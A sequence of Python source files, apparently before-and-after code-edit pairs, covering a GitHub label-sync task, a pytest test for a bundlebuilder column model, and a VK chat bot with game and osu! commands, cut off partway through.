"""Set task to pending."""
await event.set_status(gh, util.EVT_PENDING, 'labels/sync', 'Pending')
async def run(event, gh, config, **kwargs):
"""Run task."""
disabled = 'sync' in config.get('disabled_actions', [])
print(f'SYNC: {event.full_name} ({'disabled' if disabled else 'enabled'})')
if disabled:
return
try:
if config.get('error', ''):
raise Exception(config['error'])
await sync(event, gh, config)
success = True
except Exception:
traceback.print_exc(file=sys.stdout)
success = False
await event.set_status(
gh,
util.EVT_SUCCESS if success else util.EVT_FAILURE,
'labels/sync',
"Task completed" if success else "Failed to complete task"
)
| """Label syncing."""
import asyncio
from collections import namedtuple
import re
import traceback
import sys
from . import util
RE_VALID_COLOR = re.compile('#[a-fA-F0-9]{6}')
class LabelEdit(namedtuple('LabelEdit', ['old', 'new', 'color', 'description', 'modified'])):
"""Label Edit tuple."""
def _validate_str(name):
"""Validate name."""
if not isinstance(name, str):
raise TypeError(f"Key value is not of type 'str', type '{type(name)}' received instead")
def _validate_color(color):
"""Validate color."""
_validate_str(color)
if RE_VALID_COLOR.match(color) is None:
raise ValueError(f'{color} is not a valid color')
def _resolve_color(color, colors):
"""Parse color."""
if RE_VALID_COLOR.match(color) is None:
color = colors[color]
return color
def _parse_colors(config):
"""Get colors."""
colors = {}
for name, color in config.get('colors', {}).items():
try:
_validate_color(color)
_validate_str(name)
if name in colors:
raise ValueError(f"The name '{name}' is already present in the color list")
colors[name] = color[1:]
except Exception:
traceback.print_exc(file=sys.stdout)
return colors
def _find_label(labels, label, label_color, label_description):
"""Find label."""
edit = None
for value in labels:
name = value['name']
old_name = value.get('renamed', name)
if label.lower() != old_name.lower():
if label.lower() == name.lower():
old_name = name
else:
continue
new_name = name
color = value['color']
description = value.get('description', '')
modified = False
# Editing an existing label
if (
label.lower() == old_name.lower() and
(
label_color.lower() != color.lower() or
label_description != description or
label != old_name or
label.lower() != new_name.lower()
)
):
modified = True
edit = LabelEdit(old_name, new_name, color, description, modified=modified)
break
return edit
def _parse_labels(config):
"""Parse labels."""
labels = []
seen = set()
colors = _parse_colors(config)
for value in config.get('labels', []):
try:
name = value['name']
_validate_str(name)
value['color'] = _resolve_color(value['color'], colors)
if 'renamed' in value:
_validate_str(value['renamed'])
if 'description' in value and not isinstance(value['description'], str):
raise ValueError(f"Description for '{name}' should be of type str")
if name.lower() in seen:
raise ValueError(f"The name '{name}' is already present in the label list")
seen.add(name.lower())
labels.append(value)
except Exception:
traceback.print_exc(file=sys.stdout)
ignores = set()
for name in config.get('ignores', []):
try:
_validate_str(name)
ignores.add(name.lower())
except Exception:
pass
return labels, ignores
async def sync(event, gh, config):
"""Sync labels."""
labels, ignores = _parse_labels(config)
delete = config.get('delete_labels', False)
evaluated = set()
# No labels defined, assume this has not been configured
if not labels:
return
# Get all labels before we start modifying labels.
repo_labels = [label async for label in event.get_repo_labels(gh)]
current_names = set([value['name'].lower() for value in repo_labels])
# Iterate labels deleting or updating labels that need it.
for label in repo_labels:
edit = _find_label(labels, label['name'], label['color'], label['description'])
if edit is not None and edit.modified:
already_exists = edit.old.lower() != edit.new.lower() and edit.new.lower() in current_names
if already_exists and delete:
print(f'SYNC: Deleting {label["name"]}: #{label["color"]} "{label["description"]}"')
await event.remove_repo_label(gh, edit.old)
current_names.remove(edit.old.lower())
await asyncio.sleep(1)
elif not already_exists:
print(f'SYNC: Updating {edit.new}: #{edit.color} "{edit.description}"')
await event.update_repo_label(gh, edit.old, edit.new, edit.color, edit.description)
current_names.remove(edit.old.lower())
current_names.add(edit.new.lower())
await asyncio.sleep(1)
else:
print(f'SYNC: Skipping {label["name"]}: #{label["color"]} "{label["description"]}"')
evaluated.add(edit.old.lower())
evaluated.add(edit.new.lower())
else:
if edit is None and delete and label['name'].lower() not in ignores:
print(f'SYNC: Deleting {label["name"]}: #{label["color"]} "{label["description"]}"')
await event.remove_repo_label(gh, label['name'])
current_names.remove(label['name'].lower())
await asyncio.sleep(1)
else:
print(f'SYNC: Skipping {label["name"]}: #{label["color"]} "{label["description"]}"')
evaluated.add(label['name'].lower())
# Create any labels that need creation.
for value in labels:
name = value['name']
color = value['color']
description = value.get('description', '')
# If the name has already been evaluated, we've likely already added the name or removed it intentionally.
if name.lower() not in evaluated:
print(f'SYNC: Creating {name}: #{color} "{description}"')
await event.add_repo_label(gh, name, color, description)
await asyncio.sleep(1)
async def pending(event, gh):
"""Set task to pending."""
await event.set_status(gh, util.EVT_PENDING, 'labels/sync', 'Pending')
async def run(event, gh, config, **kwargs):
"""Run task."""
disabled = 'sync' in config.get('disabled_actions', [])
print(f'SYNC: {event.full_name} ({"disabled" if disabled else "enabled"})')
if disabled:
return
try:
if config.get('error', ''):
raise Exception(config['error'])
await sync(event, gh, config)
success = True
except Exception:
traceback.print_exc(file=sys.stdout)
success = False
await event.set_status(
gh,
util.EVT_SUCCESS if success else util.EVT_FAILURE,
'labels/sync',
"Task completed" if success else "Failed to complete task"
)
|
from pytest import raises as assert_raises
from bundlebuilder.constants import (
DESCRIPTION_MAX_LENGTH,
COLUMN_TYPE_CHOICES,
SHORT_DESCRIPTION_LENGTH,
)
from bundlebuilder.exceptions import ValidationError
from bundlebuilder.models import ColumnDefinition
def test_column_definition_validation_fails():
column_definition_data = {
'type': 'anything',
'description': '\U0001f4a9' * DESCRIPTION_MAX_LENGTH,
'required': 69,
'short_description': '\U0001f4a9' * DESCRIPTION_MAX_LENGTH,
}
with assert_raises(ValidationError) as exc_info:
ColumnDefinition(**column_definition_data)
error = exc_info.value
assert error.args == ({
'name': ['Missing data for required field.'],
'type': [
'Must be one of: '
f'{', '.join(map(repr, COLUMN_TYPE_CHOICES))}.'
],
'required': ['Not a valid boolean.'],
'short_description': [
f'Must be at most {SHORT_DESCRIPTION_LENGTH} characters long.'
],
},)
def test_column_definition_validation_succeeds():
column_definition_data = {
'name': 'id',
'type': 'integer',
}
column_definition = ColumnDefinition(**column_definition_data)
assert column_definition.json == column_definition_data
| from pytest import raises as assert_raises
from bundlebuilder.constants import (
DESCRIPTION_MAX_LENGTH,
COLUMN_TYPE_CHOICES,
SHORT_DESCRIPTION_LENGTH,
)
from bundlebuilder.exceptions import ValidationError
from bundlebuilder.models import ColumnDefinition
def test_column_definition_validation_fails():
column_definition_data = {
'type': 'anything',
'description': '\U0001f4a9' * DESCRIPTION_MAX_LENGTH,
'required': 69,
'short_description': '\U0001f4a9' * DESCRIPTION_MAX_LENGTH,
}
with assert_raises(ValidationError) as exc_info:
ColumnDefinition(**column_definition_data)
error = exc_info.value
assert error.args == ({
'name': ['Missing data for required field.'],
'type': [
'Must be one of: '
f'{", ".join(map(repr, COLUMN_TYPE_CHOICES))}.'
],
'required': ['Not a valid boolean.'],
'short_description': [
f'Must be at most {SHORT_DESCRIPTION_LENGTH} characters long.'
],
},)
def test_column_definition_validation_succeeds():
column_definition_data = {
'name': 'id',
'type': 'integer',
}
column_definition = ColumnDefinition(**column_definition_data)
assert column_definition.json == column_definition_data
|
from vk_api.longpoll import VkLongPoll, VkEventType
from time import gmtime, strftime
from importlib import reload
import vk_api
import sys
import os
import osu.calc as calc
import osucommands
import sessionhandler as sh
import utils as ut
import random
import urllib.request
import versions as ver
import commands as com
ingame = []
comhelp = {
'help': 'show the help message for command/to see commands list // ~help | ~ [command or page number (2)]',
'osuhelp': 'show the help message for osu-like commands // ~osuhelp | o! | o!help [command]',
'pingS': 'u can\'t write "~ping"?',
'ping': 'just ping the bot // ~ping',
'ruleofinternet': 'check the interesting rule (ex. 34) // ~rofi | ~ruleofinternet (number/"random")',
'gamehelp': 'help for ingame commands // ~gamehelp | ! | !help [command or page number(2, 3)]',
'socialhelp': 'help for social commands // ~socialhelp | "/" | "/help" [command]',
'loli': 'catch the random loli // ~loli',
'upload': 'upload the picture to bot\'s drive // ~uploadone (photo attachment)',
'uploadmany': 'upload the pictureS to bot\'s drive // ~uploadone (photo attachmentS)'
}
gamehelp = {
'enter': 'enter to the world! // !enter',
'version': 'find out account version // !version',
'upgrade': 'upgrate to latest account version // !upgrade',
'register': 'register the account // !register',
'unregister': 'delete the account // !unregister',
'whereami': 'we know where are you (x;y) // !whereami',
'description': 'see item desc in ur inv. // !description',
'tradeinv': 'see your trade inv. // !tradeinv',
'showinv': 'see your inv. // !showinv',
'move': 'move is some direction // !move (right, left, up, down)',
'leave': 'leave the session // !leave',
'tileplayers': 'see all players on your tile // !tileplayers',
'save': 'save your position // !save',
'open': 'open the chest if u\'re on it // !open',
'action': 'action w/ item in inventory // !action (item number in inv.)',
'itemlist': 'check the item list in the shop // !itemlist',
'buy': 'buy the item // !buy (item number in merchant\'s inv.)',
'sell': 'sell the item // !sell (item number in inventory)',
'actlist': 'show the actions list that u can do // !actlist'
}
sochelp = {
'chat': 'chat with players on your tile (ONLY in game) // /chat (message)',
'addfriend': 'send/accept friend request // /addfriend (ID)',
'denyrequest': 'deny/cancel friend request // /denyrequest (ID)',
'friendlist': 'your friend list // /friendlist',
'me': 'do something in chat (like hug someone) (ONLY in game) // /me (action(message))',
'pm': 'send private message to friend (ONLY in game) // /pm (friendID) (message)',
'removefriend': 'remove user from your friend list // /removefriend (friendID)',
'sendmoney': 'send money to user // /sendmoney (userID) (count)',
'sendgift': 'send gift to your friend // /sendgift (friendID) (item number in inventory) (message)'
}
osuhelp = {
'pp': 'check pp for map // o!pp (link) [args (check ~osuhelp pp)]',
'ppextended': '''check pp for map // o!pp (link) [args (--oppai recommended)]
Arguments:
-m, --mods (HRHDDT-like)
-a, --acc (float number like, ex. 99.9 (if more then 100.0, equals to 100.0))
-o, --offline | --oppai (use the local calculation (also can calculate unranked maps))''',
'register': 'register as user to get recent scores for your profile // o!register (Username or ID in osu!)',
'recent': 'view your/user\'s recent score // o!recent [Username or ID in osu!]',
'change': 'change your osu! profile // o!change (Username or ID in osu!)',
'me': 'see your osu!profile // o!me',
'changeavatar': 'redownload your avatar if you changed it // o!changeavatar'
}
with open('token.txt', 'r') as f:
token = f.read()
vk_session = vk_api.VkApi(token=token)
longpoll = VkLongPoll(vk_session)
print("Longpool authorized.")
vk = vk_session.get_api()
print("API things authorized.")
with open("usertoken.txt", "r") as uf:
usertoken = uf.read()
uservkSession = vk_api.VkApi(token=usertoken)
uvk = uservkSession.get_api()
print("User API things authorized.")
def main():
    """Run the VK long-poll loop and dispatch chat commands.

    Command prefixes: "~" general bot commands, "!" game commands,
    "/" social commands, "o!" osu! commands.  Uses the module-level
    globals `vk`, `uvk`, `vk_session`, `longpoll`, `token`, `ingame`
    and the *help dictionaries.  Runs until ~shutdown / ~restart.
    """
    upload = vk_api.VkUpload(vk_session)
    # Bot creator's VK id — gates the admin-only commands
    # (~shutdown, ~restart, ~reload, ~!!dropsession).
    with open('creator.txt', 'r') as c:
        cid = int(c.read())
    # ~restart leaves the requester's id in .rsttemp; tell them we're back.
    if os.path.isfile('.rsttemp'):
        with open('.rsttemp') as f:
            uid = f.read()
        os.remove('.rsttemp')
        vk.messages.send(random_id=0, user_id=uid, message="Bot restarted")
    print("---------------Rdy to use---------------")
    while True:
        try:
            for event in longpoll.listen():
                if event.type == VkEventType.MESSAGE_NEW and event.to_me and event.text:
                    uid = event.user_id
                    osc = osucommands.commands(uid)
                    userData = vk.users.get(user_ids=uid)[0]
                    userName = userData['first_name']
                    userLastName = userData['last_name']
                    # Whitespace-only text would make event.text.split()[0]
                    # raise IndexError further down; nothing to dispatch anyway.
                    if not event.text.split():
                        continue
                    # ---------------- general "~" commands ----------------
                    if event.text.startswith("~loli"):
                        if len(event.text.split()) == 1:
                            directory = "\\photos"
                            photo = random.choice(os.listdir(directory))
                            # BUGFIX: was `directory + photo`, which misses the
                            # path separator between folder and file name.
                            onUpload = upload.photo_messages(photos=os.path.join(directory, photo))[0]
                            vk.messages.send(random_id=0, user_id=uid, message="here's your random loli", attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp['loli'])
                    if event.text.startswith("~uploadone"):
                        if len(event.text.split()) == 1:
                            # The long-poll layer exposes each attachment as two
                            # dict entries, hence len == 2 means "exactly one".
                            if len(event.attachments) == 2:
                                print(event.attachments)
                                if event.attachments["attach1_type"] == "photo":
                                    photo = uvk.photos.getById(photos=event.attachments["attach1"])[0]["sizes"][-1]
                                    urllib.request.urlretrieve(photo["url"], os.path.join("photos", f"{photo['url'].split('/')[-1]}"))
                                    vk.messages.send(random_id=0, user_id=uid, message="Successfully uploaded on bot\'s drive")
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=f"The attachment type must be 'photo', not {event.attachments['attach1_type']}")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="You can upload only one image")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp["upload"])
                    if event.text.startswith("~uploadmany"):
                        if len(event.attachments) >= 2:
                            urls = []
                            for att in range(1, len(event.attachments) // 2 + 1):
                                if event.attachments[f"attach{att}_type"] == "photo":
                                    urls.append(uvk.photos.getById(photos=event.attachments[f"attach{att}"])[0]["sizes"][-1]["url"])
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=f"Attachment {att} will not be uploaded (attachmentType:{event.attachments[f'attach{att}_type']})")
                            if urls:
                                dots = f"00.00%: 0/{len(urls)}"
                                # messages.send returns the new message id; it is
                                # reused below to edit the progress message in place.
                                message = vk.messages.send(random_id=0, user_id=uid, message=f"{dots}")
                                print(message)
                                for num, photo_url in enumerate(urls):
                                    urllib.request.urlretrieve(photo_url, os.path.join("photos", f"{photo_url.split('/')[-1]}"))
                                    vk.messages.edit(peer_id=uid, message_id=message, message=f"{ut.toFixed((num+1)/len(urls) * 100, 2)}% | {num+1}/{len(urls)}")
                                vk.messages.edit(peer_id=uid, message_id=message, message="Attachments uploaded to bot's drive")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="You don't attached anything")
                    # 2 commands w/ secret syntax
                    # ---------------- osu! "o!" commands ----------------
                    if event.text.startswith("o!pp"):
                        args = event.text.split()
                        if len(args) >= 2:
                            if ut.checkURL(args[1]):
                                stats = {"acc": 0.0, "mods": "", "combo": 0}
                                # -a / —acc argument (note: em-dash forms kept as-is).
                                if any(i in args for i in ["-a", "—acc"]):
                                    a = "-a" if "-a" in args else "—acc"
                                    ind = args.index(a)
                                    # BUGFIX: narrowed bare except; float() raises
                                    # ValueError, a missing value raises IndexError.
                                    try:
                                        acc = float(args[ind+1])
                                        stats["acc"] = acc
                                        if acc > 100:
                                            vk.messages.send(random_id=0, user_id=uid, message=f'Accuracy can\'t be more than 100% (entered {acc}), equate to 100%')
                                            stats["acc"] = 0.0
                                        if acc < 0:
                                            vk.messages.send(random_id=0, user_id=uid, message=f'Accuracy can\'t be less than 0% (entered {acc}), equate to {acc} module')
                                            stats["acc"] = -acc
                                    except (ValueError, IndexError):
                                        vk.messages.send(random_id=0, user_id=uid, message='"acc" argument entered wrong')
                                if "-combo" in args:
                                    ind = args.index("-combo")
                                    try:
                                        stats["combo"] = int(args[ind+1])
                                    except (ValueError, IndexError):
                                        vk.messages.send(random_id=0, user_id=uid, message='"-combo" argument entered wrong')
                                if any(i in args for i in ["-m", "—mods"]):
                                    m = "-m" if "-m" in args else "—mods"
                                    ind = args.index(m)
                                    # BUGFIX: guard ind+1 — a trailing "-m" raised
                                    # an uncaught IndexError and killed the loop.
                                    if ind + 1 >= len(args) or len(args[ind+1]) <= 1:
                                        # BUGFIX: was vk.messasges (typo -> AttributeError).
                                        vk.messages.send(random_id=0, user_id=uid, message='"mods" argument entered wrong')
                                    elif args[ind+1].startswith('-'):
                                        vk.messages.send(random_id=0, user_id=uid, message='"mods" argument entered wrong')
                                    else:
                                        # Split the mod string into two-letter chunks.
                                        s = [args[ind+1][i:i+2] for i in range(0, len(args[ind+1]), 2)]
                                        wm = []
                                        # BUGFIX: conditions were `"HR" and "EZ" in s`,
                                        # which only tested the second membership.
                                        if "HR" in s and "EZ" in s:
                                            vk.messages.send(random_id=0, user_id=uid, message="HR and EZ can't be in one selection")
                                            # BUGFIX: random.choice takes one sequence.
                                            del s[random.choice([s.index("HR"), s.index("EZ")])]
                                        if "DT" in s and "HF" in s:
                                            vk.messages.send(random_id=0, user_id=uid, message="DT and HF can't be in one selection")
                                            del s[random.choice([s.index("DT"), s.index("HF")])]
                                        if "NF" in s and ("SD" in s or "PF" in s):
                                            vk.messages.send(random_id=0, user_id=uid, message="NF and SD/PF can't be in one selection")
                                        if "RX" in s or "AP" in s:
                                            vk.messages.send(random_id=0, user_id=uid, message="RX and AP mods aren't provided when calcucating pp")
                                        # BUGFIX: iterate over a copy — deleting from
                                        # `s` while iterating it skipped elements.
                                        for i in list(s):
                                            if i.upper() == "RX":
                                                s.remove(i)
                                            elif i.upper() == "AP":
                                                s.remove(i)
                                            elif i.upper() == "SD":
                                                s.remove(i)
                                                stats["misses"] = 0
                                            elif i.upper() == "PF":
                                                s.remove(i)
                                                stats["acc"] = 0.0
                                            elif i.upper() in ["HR", "HD", "DT", "NC", "FL", "EZ", "NF", "HT"]:
                                                stats["mods"] += i.upper()
                                            else:
                                                wm.append(i)
                                        if wm:
                                            # BUGFIX: send() was called without
                                            # random_id/user_id keyword arguments.
                                            vk.messages.send(random_id=0, user_id=uid, message=f"These mods aren't exist: {', '.join(wm)}")
                                link = args[1]
                                if not link.startswith("https://"):
                                    link = f"https://{link}"
                                # `beatmap` ends up a dict on success or an error
                                # string on failure.  (Renamed from `map`, which
                                # shadowed the builtin.)
                                beatmap = None
                                if any(i in args for i in ["-o", "—oppai", "—offline"]):
                                    beatmap = osc.calcOppai(link, acc=stats['acc'], mods=stats['mods'])
                                if not beatmap:
                                    if osc.checkStatus(link):
                                        beatmap = osc.calcTillerino(link, acc=stats['acc'], mods=stats['mods'])
                                        if not beatmap:
                                            message = vk.messages.send(random_id=0, user_id=uid, message="An error has occured when trying to do things w/ Tillerino API")
                                            beatmap = calc.calcMap(link,
                                                                   acc=stats['acc'],
                                                                   combo=stats['combo'],
                                                                   amods=stats['mods'],
                                                                   uid=uid,
                                                                   messageid=message,
                                                                   t=token)
                                    else:
                                        beatmap = "Beatmap status should be Ranked (or use -oppai)"
                                if isinstance(beatmap, dict):
                                    onUpload = None
                                    # NOTE(review): `not beatmap` can never be true
                                    # here (it is a non-empty dict), so the dotosu
                                    # thumbnail branch looks unreachable — preserved
                                    # as in the original pending confirmation.
                                    if not beatmap:
                                        onUpload = upload.photo_messages(f"osu\\tmp\\dotosu\\Beatmap-{beatmap['beatmapid']}\\thumbnail.jpg")[0]
                                    else:
                                        onUpload = upload.photo_messages(f"tmpthumbs\\{beatmap['beatmapsetid']}.jpg")[0]
                                    length = strftime("%M:%S", gmtime(int(osucommands.getLength(beatmap["beatmapid"]))))
                                    msg = f"""Title: {beatmap['title']}
Length: {length}
AR: {beatmap['AR']} | CS: {beatmap['CS']} | OD: {beatmap['OD']}
Stars: {beatmap['stars']}
Combo: {beatmap['combo']}/{beatmap['maxcombo']}
PP: """
                                    if len(beatmap["PP"]) == 1:
                                        msg += f"{beatmap['PP'][0]}\nAccuracy: {beatmap['acc']}%"
                                    else:
                                        # Multi-acc output: 95%..100%, " | "-separated.
                                        for idx, pp in enumerate(beatmap['PP']):
                                            msg += f"{idx+95}%: {pp}pp | " if idx != len(beatmap["PP"])-1 else f"{idx+95}%: {pp}pp"
                                    vk.messages.send(random_id=0, user_id=uid, message=msg,
                                                     attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=beatmap)
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Please, recheck URL")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["pp"])
                    if event.text.split()[0] in ["o!r", "o!recent"]:
                        if len(event.text.split()) == 1:
                            # recentScore() -> (text, beatmapsetid-or-falsy)
                            d = osc.recentScore()
                            if d[1]:
                                onUpload = upload.photo_messages(f"tmpthumbs\\{d[1]}.jpg")[0]
                                vk.messages.send(random_id=0, user_id=uid, message=d[0],
                                                 attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=d[0])
                        if len(event.text.split()) == 2:
                            d = osc.recentScore(event.text.split()[1])
                            if d[1]:
                                onUpload = upload.photo_messages(f"tmpthumbs\\{d[1]}.jpg")[0]
                                vk.messages.send(random_id=0, user_id=uid, message=d[0],
                                                 attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=d[0])
                        if len(event.text.split()) == 3:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["recent"])
                    if event.text.split()[0] in ["o!change", "o!c"]:
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=osucommands.change(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["change"])
                    if event.text.split()[0] in ["o!reg", "o!register"]:
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=osucommands.register(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["register"])
                    if event.text.startswith("o!changeavatar"):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=osc.changeAvatar())
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["changeavatar"])
                    if event.text.startswith("o!me"):
                        if len(event.text.split()) == 1:
                            # me() -> profile dict on success, error string otherwise.
                            user = osc.me()
                            if isinstance(user, dict):
                                onUpload = upload.photo_messages(user["avatarPath"])[0]
                                # English possessive: "s" -> trailing apostrophe.
                                if user["username"].lower().endswith("s"):
                                    user["username"] += "'"
                                else:
                                    user["username"] += "'s"
                                msg = f"""{user["username"]} profile
PP: {user["pp"]}
Accuracy: {user["acc"]}%
Level: {user["level"]}
Global Rank / Country Rank: #{user["rank"]} / #{user["countryrank"]} ({user["country"]})
{user["playcount"]} plays total
Hits: {user["x300"]} x300 | {user["x100"]} x100 | {user["x50"]} x50
SS/SSH ranks: {user["SS"]} / {user["SSH"]}
S/SH ranks: {user["S"]} / {user["SH"]}
A ranks: {user["A"]}
"""
                                vk.messages.send(random_id=0, user_id=uid, message=msg,
                                                 attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["me"])
                    if event.text.startswith("!test"):
                        if len(event.text.split()) >= 2:
                            print(event.text.split())
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message='n')
                    if event.text.startswith('~ping'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message='понг блядь')
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp['pingS'])
                    # ---------------- admin-only commands ----------------
                    if event.text.startswith('~shutdown'):
                        if event.user_id == cid:
                            vk.messages.send(random_id=0, user_id=uid, message='Shutting down...')
                            raise SystemExit
                    if event.text.startswith('~restart'):
                        if event.user_id == cid:
                            if ingame:
                                # BUGFIX: iterate over a copy — removing from the
                                # list while iterating it skipped every other player.
                                for i in list(ingame):
                                    ingame.remove(i)
                                    com.mapLeave(i)
                                    vk.messages.send(random_id=0, user_id=i, message="Your account has been forcibly removed from the session.")
                                    vk.messages.send(random_id=0, user_id=uid, message=f"{vk.users.get(user_ids=i)[0]['first_name']} был удалён из сессии")
                            vk.messages.send(random_id=0, user_id=uid, message='Restarting bot...')
                            print("Started restart")
                            # Remember who asked so we can ping them after exec.
                            with open('.rsttemp', 'w') as f:
                                f.write(str(event.user_id))
                            os.execv(sys.executable, ['python'] + sys.argv)
                    if event.text.startswith('~reload'):
                        if event.user_id == cid:
                            if len(event.text.split()) == 2:
                                if event.text.split()[1] in ["sh", "com", "ver", "utils"]:
                                    if event.text.split()[1] == "sh":
                                        reload(sh)
                                    if event.text.split()[1] == "com":
                                        reload(com)
                                    if event.text.split()[1] == "ver":
                                        reload(ver)
                                    if event.text.split()[1] == "utils":
                                        # BUGFIX: the module is imported as `ut`;
                                        # `reload(utils)` raised NameError.
                                        reload(ut)
                                    vk.messages.send(random_id=0, user_id=uid, message=f"Module \"{event.text.split()[1]}\" reloaded")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="~reload (module)")
                    if event.text.startswith('~ruleofinternet') or event.text.startswith('~rofi'):
                        if len(event.text.split()) == 2:
                            if event.text.split()[1] == 'random':
                                randrule = str(random.randint(1, 49))
                                vk.messages.send(random_id=0, user_id=uid, message=com.rofi(randrule))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=com.rofi(event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp['ruleofinternet'])
                    # ---------------- game "!" commands ----------------
                    if event.text.startswith('!register'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=com.register(uid, userName, userLastName))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp["register"])
                    if event.text.startswith('!showinv'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=com.showInventory(uid))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp["showinv"])
                    if event.text.startswith('!unregister'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=com.delete(uid))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['unregister'])
                    if event.text.startswith('~secretkitty'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message="""
⊂_ヽ
  \\ Λ_Λ
  \( ˇωˇ)
    ⌒ヽ
   /   へ\
   /  / \\
   レ ノ   ヽ_つ
  / /
  / /|
 ( (ヽ
 | |、\
 | 丿 \ ⌒)
 | |  ) /
`ノ )  Lノ
(_/
""")
                    if event.text.startswith('!version'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=f"Account version: v.{ut.checkVersion(uid)}\nLatest version: v.{ver.latestVersion}")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['version'])
                    if event.text.startswith('!upgrade'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=ver.upgradeToLatest(uid))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['upgrade'])
                    if event.text.startswith('!enter'):
                        if len(event.text.split()) == 1:
                            if uid not in ingame:
                                ingame.append(uid)
                                com.playerToMap(uid)
                                vk.messages.send(random_id=0, user_id=uid, message="Account is now in session")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="U're already in session")
                        else:
                            # BUGFIX: keyword was misspelled `userid=`.
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp['enter'])
                    if event.text.startswith("!actlist"):
                        if uid in ingame:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message=com.actions(uid))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp["actlist"])
                        else:
                            vk.messages.send(random_id=27, user_id=uid, message="You must be in session")
                    if event.text.startswith("!move"):
                        if uid in ingame:
                            if len(event.text.split()) == 2:
                                direction = event.text.split()[1].lower()
                                if direction in ['right', 'left', 'up', 'down']:
                                    vk.messages.send(random_id=0, user_id=uid, message=sh.move(uid, direction))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message="Wrong direction, enter one of the 'right', 'left', 'up', 'down'")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("!open"):
                        if ut.checkVersion(uid) >= ver.latestVersion:
                            if uid in ingame:
                                if len(event.text.split()) == 1:
                                    vk.messages.send(random_id=0, user_id=uid, message=sh.openChest(uid))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=gamehelp['open'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                        else:
                            # BUGFIX: the upgrade command is "!upgrade", not "~upgrade".
                            vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '!upgrade' command")
                    if event.text.startswith("!description"):
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=com.itemDesc(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['description'])
                    if event.text.startswith("!action"):
                        if uid in ingame:
                            if len(event.text.split()) == 2:
                                vk.messages.send(random_id=0, user_id=uid, message=sh.itemAction(uid, event.text.split()[1]))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp['action'])
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("!itemlist"):
                        if uid in ingame:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message=com.showShopList(uid))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp['itemlist'])
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("!buy"):
                        if ut.checkVersion(uid) >= ver.latestVersion:
                            if uid in ingame:
                                if len(event.text.split()) == 2:
                                    vk.messages.send(random_id=0, user_id=uid, message=com.buyItem(uid, event.text.split()[1]))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=gamehelp['buy'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '!upgrade' command")
                    if event.text.startswith("!sell"):
                        if ut.checkVersion(uid) >= ver.latestVersion:
                            if uid in ingame:
                                if len(event.text.split()) == 2:
                                    vk.messages.send(random_id=0, user_id=uid, message=com.sellItem(uid, event.text.split()[1]))
                                else:
